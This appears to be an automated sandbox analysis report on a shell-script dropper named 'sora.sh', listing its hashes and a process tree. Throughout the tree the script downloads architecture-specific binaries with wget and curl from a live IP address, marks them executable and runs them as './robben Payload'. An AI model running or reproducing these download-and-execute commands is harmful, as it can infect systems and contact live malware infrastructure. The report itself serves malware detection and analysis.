Analysis
-
max time kernel
4s -
max time network
133s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
29-08-2024 20:35
Static task
static1
Behavioral task
behavioral1
Sample
sora.sh
Resource
ubuntu1804-amd64-20240611-en
2 signatures
150 seconds
Behavioral task
behavioral2
Sample
sora.sh
Resource
debian9-armhf-20240611-en
4 signatures
150 seconds
Behavioral task
behavioral3
Sample
sora.sh
Resource
debian9-mipsbe-20240729-en
3 signatures
150 seconds
Behavioral task
behavioral4
Sample
sora.sh
Resource
debian9-mipsel-20240611-en
3 signatures
150 seconds
General
-
Target
sora.sh
-
Size
2KB
-
MD5
23ce60917752705f59bde8ca8569c3d6
-
SHA1
651959b325ca119ccc280a706ef57da197df6dfb
-
SHA256
c4575e4be3ce1429bf36332d68ad7aa6612852748f0a94067e6936433c26f344
-
SHA512
9ce028bb852c3e0b67c66f55cd9b91a2498acccdb80b80220a3a99ca714521de13a1da5c9184ba6732bdb793df98effa7b5a511a5a3f5d30b57de6e88839329b
Score
7/10
Malware Config
Signatures
-
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 1496 robben /tmp/robben 1505 robben /tmp/robben 1511 robben /tmp/robben 1517 robben /tmp/robben 1523 robben /tmp/robben 1537 robben /tmp/robben 1543 robben /tmp/robben 1549 robben /tmp/robben 1555 robben /tmp/robben 1561 robben /tmp/robben 1567 robben /tmp/robben 1573 robben /tmp/robben 1579 robben /tmp/robben 1585 robben -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben sora.sh
Processes
-
/tmp/sora.sh/tmp/sora.sh1⤵
- Writes file to tmp directory
PID:1491 -
/usr/bin/wgetwget http://188.127.247.15/bins/sora.x862⤵PID:1492
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.x862⤵PID:1493
-
-
/bin/catcat sora.x862⤵PID:1494
-
-
/bin/chmodchmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH2⤵PID:1495
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1496
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.mips2⤵PID:1498
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.mips2⤵PID:1502
-
-
/bin/catcat sora.mips2⤵PID:1503
-
-
/bin/chmodchmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH2⤵PID:1504
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1505
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.x86_642⤵PID:1507
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.x86_642⤵PID:1508
-
-
/bin/catcat sora.x86_642⤵PID:1509
-
-
/bin/chmodchmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH2⤵PID:1510
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1511
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.i4682⤵PID:1513
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.i4682⤵PID:1514
-
-
/bin/catcat sora.i4682⤵PID:1515
-
-
/bin/chmodchmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH2⤵PID:1516
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1517
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.i6862⤵PID:1519
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.i6862⤵PID:1520
-
-
/bin/catcat sora.i6862⤵PID:1521
-
-
/bin/chmodchmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH2⤵PID:1522
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1523
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.mpsl2⤵PID:1525
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.mpsl2⤵PID:1534
-
-
/bin/catcat sora.mpsl2⤵PID:1535
-
-
/bin/chmodchmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH2⤵PID:1536
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1537
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.arm42⤵PID:1539
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.arm42⤵PID:1540
-
-
/bin/catcat sora.arm42⤵PID:1541
-
-
/bin/chmodchmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH2⤵PID:1542
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1543
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.arm52⤵PID:1545
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.arm52⤵PID:1546
-
-
/bin/catcat sora.arm52⤵PID:1547
-
-
/bin/chmodchmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH2⤵PID:1548
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1549
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.arm62⤵PID:1551
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.arm62⤵PID:1552
-
-
/bin/catcat sora.arm62⤵PID:1553
-
-
/bin/chmodchmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH2⤵PID:1554
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1555
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.arm72⤵PID:1557
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.arm72⤵PID:1558
-
-
/bin/catcat sora.arm72⤵PID:1559
-
-
/bin/chmodchmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH2⤵PID:1560
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1561
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.ppc2⤵PID:1563
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.ppc2⤵PID:1564
-
-
/bin/catcat sora.ppc2⤵PID:1565
-
-
/bin/chmodchmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH2⤵PID:1566
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1567
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.ppc440fp2⤵PID:1569
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.ppc440fp2⤵PID:1570
-
-
/bin/catcat sora.ppc440fp2⤵PID:1571
-
-
/bin/chmodchmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH2⤵PID:1572
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1573
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.m68k2⤵PID:1575
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.m68k2⤵PID:1576
-
-
/bin/catcat sora.m68k2⤵PID:1577
-
-
/bin/chmodchmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH2⤵PID:1578
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1579
-
-
/usr/bin/wgetwget http://188.127.247.15/bins/sora.sh42⤵PID:1581
-
-
/usr/bin/curlcurl -O http://188.127.247.15/bins/sora.sh42⤵PID:1582
-
-
/bin/catcat sora.sh42⤵PID:1583
-
-
/bin/chmodchmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH2⤵PID:1584
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1585
-